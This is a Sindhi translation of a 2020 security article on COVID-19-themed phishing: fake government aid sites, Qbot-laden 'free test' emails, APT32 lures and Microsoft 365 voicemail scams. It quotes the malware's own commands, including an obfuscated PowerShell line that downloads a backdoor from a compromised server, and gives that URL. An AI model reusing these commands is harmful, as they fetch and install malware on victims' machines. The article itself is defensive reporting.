حملو ڪندڙ COVID-19 موضوع جو استحصال جاري رکندا آهن، انهن صارفين لاءِ وڌيڪ ۽ وڌيڪ خطرا پيدا ڪري رهيا آهن جيڪي وڏي دلچسپي سان وبا سان لاڳاپيل هر شيءِ ۾ دلچسپي رکن ٿا. IN اسان اڳ ۾ ئي ڳالهائي چڪا آهيون ته ڪورون وائرس جي نتيجي ۾ ڪهڙي قسم جا مالويئر ظاهر ٿيا، ۽ اڄ اسان انهن سوشل انجنيئرنگ ٽيڪنڪ جي باري ۾ ڳالهائينداسين جيڪي روس سميت مختلف ملڪن ۾ استعمال ڪندڙ اڳ ۾ ئي سامهون اچي چڪا آهن. عام رجحانات ۽ مثالن جي ھيٺان آھن.
۾ ياد رکو اسان ان حقيقت جي باري ۾ ڳالهايو ته ماڻهو نه رڳو ڪورونوايرس ۽ ايپيڊيم جي باري ۾، پر مالي مدد جي قدمن بابت پڻ پڙهڻ لاء تيار آهن؟ هتي هڪ سٺو مثال آهي. جرمن رياست نارٿ رائن ويسٽفاليا يا NRW ۾ هڪ دلچسپ فشنگ حملو دريافت ڪيو ويو. حملي آورن وزارت اقتصاديات جي ويب سائيٽ جون ڪاپيون ٺاهيون ()، جتي ڪو به ماڻهو مالي مدد لاءِ درخواست ڏئي سگهي ٿو. اهڙو پروگرام اصل ۾ موجود آهي، ۽ اهو نڪتو ته اسڪيمرز لاء فائدي وارو آهي. انهن جي متاثرين جي ذاتي ڊيٽا حاصل ڪرڻ کان پوء، انهن حقيقي وزارت جي ويب سائيٽ تي هڪ درخواست ڏني، پر ٻين بينڪ تفصيلات کي اشارو ڪيو. سرڪاري انگن اکرن موجب اسڪيم جي انڪشاف ٿيڻ تائين 4 هزار اهڙيون جعلي درخواستون ڪيون ويون. نتيجي طور، متاثر شهرين لاءِ 109 ملين ڊالر جو ارادو فراڊ ڪندڙن جي هٿن ۾ اچي ويو.
ڇا توهان چاهيو ٿا مفت ٽيسٽ لاءِ COVID-19؟
ڪورونوايرس تي ٻڌل فشنگ جو هڪ ٻيو اهم مثال هو اي ميلن ۾. پيغامن صارفين جي ڌيان کي پنهنجي طرف متوجه ڪيو ته هڪ آڇ سان ڪورونوايرس انفيڪشن لاء مفت ٽيسٽ جي ذريعي. انهن جي منسلڪ ۾ Trickbot/Qakbot/Qbot جا مثال موجود هئا. ۽ جڏھن اھي پنھنجي صحت کي جانچڻ چاھين ٿا ته ”منسلڪ فارم ڀرڻ“ شروع ڪيو، ھڪ خراب اسڪرپٽ ڪمپيوٽر تي ڊائون لوڊ ڪيو ويو. ۽ سينڊ باڪسنگ ٽيسٽنگ کان بچڻ لاءِ، اسڪرپٽ ڪجهه وقت کان پوءِ ئي مکيه وائرس کي ڊائون لوڊ ڪرڻ شروع ڪيو، جڏهن حفاظتي نظامن کي يقين ٿي ويو ته ڪا به خراب سرگرمي نه ٿيندي.
ميڪروز کي فعال ڪرڻ لاءِ اڪثر صارفين کي قائل ڪرڻ پڻ آسان هو. هن کي ڪرڻ لاء، هڪ معياري چال استعمال ڪئي وئي: سوالن کي ڀرڻ لاء، توهان کي پهريان ميڪرو کي فعال ڪرڻ جي ضرورت آهي، جنهن جو مطلب آهي ته توهان کي VBA اسڪرپٽ هلائڻ جي ضرورت آهي.
جئين توهان ڏسي سگهو ٿا، VBA اسڪرپٽ خاص طور تي اينٽيوائرس کان ڇڪيل آهي.
ونڊوز ۾ هڪ انتظار جي خاصيت آهي جتي ايپليڪيشن انتظار ڪري ٿي /T <seconds> اڳ ۾ ڊفالٽ "ها" جواب قبول ڪرڻ کان اڳ. اسان جي حالت ۾، اسڪرپٽ عارضي فائلن کي حذف ڪرڻ کان پهريان 65 سيڪنڊن جو انتظار ڪيو:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
۽ انتظار ڪرڻ دوران، مالويئر ڊائون لوڊ ڪيو ويو. هن لاءِ هڪ خاص پاور شيل اسڪرپٽ شروع ڪيو ويو:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 قدر کي ڊيڪوڊنگ ڪرڻ کان پوءِ، PowerShell اسڪرپٽ ڊائون لوڊ ڪري ٿو پوئين دروازي تي جيڪو اڳي ئي هيڪ ٿيل ويب سرور تي واقع آهي جرمني مان:
http://automatischer-staubsauger.com/feature/777777.png۽ ان کي محفوظ ڪري ٿو نالي هيٺ:
C:UsersPublictmpdirfile1.exe
فولڊر ‘C:UsersPublictmpdir’ ڊهي ويندو آهي جڏهن 'tmps1.bat' فائل هلندي آهي جنهن ۾ ڪمانڊ هوندو آهي cmd /c mkdir ""C:UsersPublictmpdir"".
سرڪاري ادارن تي ٽارگيٽيڊ حملا
ان کان علاوه، FireEye تجزيه نگارن تازو ٻڌايو ته هڪ ٽارگيٽ APT32 حملي جو مقصد ووهان ۾ سرڪاري ڍانچي، ۽ انهي سان گڏ چيني وزارت ايمرجنسي مينيجمينٽ. ورهايل RTFs مان هڪ ۾ نيو يارڪ ٽائمز جي آرٽيڪل جي لنڪ شامل آهي . بهرحال، ان کي پڙهڻ تي، مالويئر ڊائون لوڊ ڪيو ويو (FireEye تجزيه نگارن مثال طور سڃاڻپ ڪئي METALJACK).
دلچسپ ڳالهه اها آهي ته سڃاڻپ جي وقت، وائرسٽوٽل جي مطابق، ڪنهن به اينٽي وائرس هن مثال کي ڳولي نه سگهيو.
جڏهن سرڪاري ويب سائيٽون بند آهن
هڪ فشنگ حملي جو سڀ کان وڌيڪ نمايان مثال صرف ٻئي ڏينهن روس ۾ ٿيو. هن جو سبب 3 کان 16 سالن جي ٻارن لاء هڪ ڊگهي-انتظار فائدي جي مقرري هئي. جڏهن 12 مئي 2020 تي درخواستون قبول ڪرڻ جي شروعات جو اعلان ڪيو ويو، لکين ماڻهو رياستي خدمتن جي ويب سائيٽ تي ڊگهي انتظار جي مدد لاءِ پهچي ويا ۽ پورٽل کي هيٺ لاٿو ته ڪنهن پروفيشنل DDoS حملي کان وڌيڪ خراب ناهي. جڏهن صدر چيو ته ”سرڪاري خدمتون درخواستن جي وهڪري کي منهن نه ڏئي سگهيون،“ ماڻهن درخواستون قبول ڪرڻ لاءِ متبادل سائيٽ شروع ڪرڻ بابت آن لائن ڳالهائڻ شروع ڪيو.
مسئلو اهو آهي ته ڪيترن ئي سائيٽن هڪ ڀيرو ڪم ڪرڻ شروع ڪيو، ۽ جڏهن ته هڪ، حقيقي هڪ posobie16.gosuslugi.ru تي، اصل ۾ ايپليڪيشنون قبول ڪري ٿي، وڌيڪ .
SearchInform جي ساٿين کي .ru زون ۾ اٽڪل 30 نوان فريب وارا ڊومين مليا. Infosecurity and Softline Company اپريل جي شروعات کان وٺي 70 ساڳين جعلي سرڪاري سروس ويب سائيٽن کي ٽريڪ ڪيو آهي. انهن جا تخليقڪار واقف علامتن کي ٺاهيندا آهن ۽ پڻ استعمال ڪندا آهن لفظن جا مجموعا gosuslugi، gosuslugi-16، vyplaty، covid-vyplaty، posobie وغيره.
هائپ ۽ سوشل انجنيئرنگ
اهي سڀ مثال صرف ان ڳالهه جي تصديق ڪن ٿا ته حملي آور ڪاميابيءَ سان ڪرونا وائرس جي موضوع کي مانيٽائيز ڪري رهيا آهن. ۽ جيترو وڌيڪ سماجي ڇڪتاڻ ۽ وڌيڪ غير واضح مسئلا، اوترو وڌيڪ موقعا آهن اسڪيمرز کي اهم ڊيٽا چوري ڪرڻ، ماڻهن کي مجبور ڪرڻ لاءِ پنهنجو پئسو پاڻ تي ڏيڻ، يا صرف وڌيڪ ڪمپيوٽرن کي هيڪ ڪرڻ.
۽ ڏنو ويو ته وبائي مرض ممڪن طور تي غير تيار ٿيل ماڻهن کي گهر مان ڪم ڪرڻ تي مجبور ڪيو آهي ، نه صرف ذاتي ، پر ڪارپوريٽ ڊيٽا پڻ خطري ۾ آهي. مثال طور، تازو Microsoft 365 (اڳوڻي Office 365) استعمال ڪندڙ پڻ هڪ فشنگ حملي جي تابع هئا. ماڻهن کي خطن سان منسلڪ طور تي وڏي پئماني تي ”مس ٿيل“ آواز جا پيغام مليا. بهرحال، فائلون اصل ۾ هڪ HTML صفحو هئا جيڪي حملي جي متاثرين ڏانهن موڪليا ويا . نتيجي طور، اڪائونٽ مان سڀني ڊيٽا جي رسائي جي نقصان ۽ سمجھوتو.
جو ذريعو: www.habr.com